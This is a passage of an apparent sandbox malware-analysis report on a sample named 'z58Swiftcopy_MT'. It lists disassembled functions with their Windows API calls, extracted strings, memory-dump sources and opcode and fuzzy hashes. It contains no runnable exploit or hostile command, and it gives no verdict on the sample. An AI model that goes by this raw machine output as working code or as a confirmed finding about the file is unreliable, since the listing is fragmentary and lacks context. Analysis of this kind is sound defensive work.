                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                                      Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                                                                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                                      Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                                      Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                                      Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                                                                      • String ID: AE
                                                                                                                                                                                                                                      • API String ID: 3548547718-685266089
                                                                                                                                                                                                                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                                                                      Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                                      Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                                                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                                      Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                                      • String ID: AE$"
                                                                                                                                                                                                                                      • API String ID: 568519121-1989281832
                                                                                                                                                                                                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                                      Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                                      Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                                                                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                                      Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                                      Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                                      Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                                      Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                                      Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
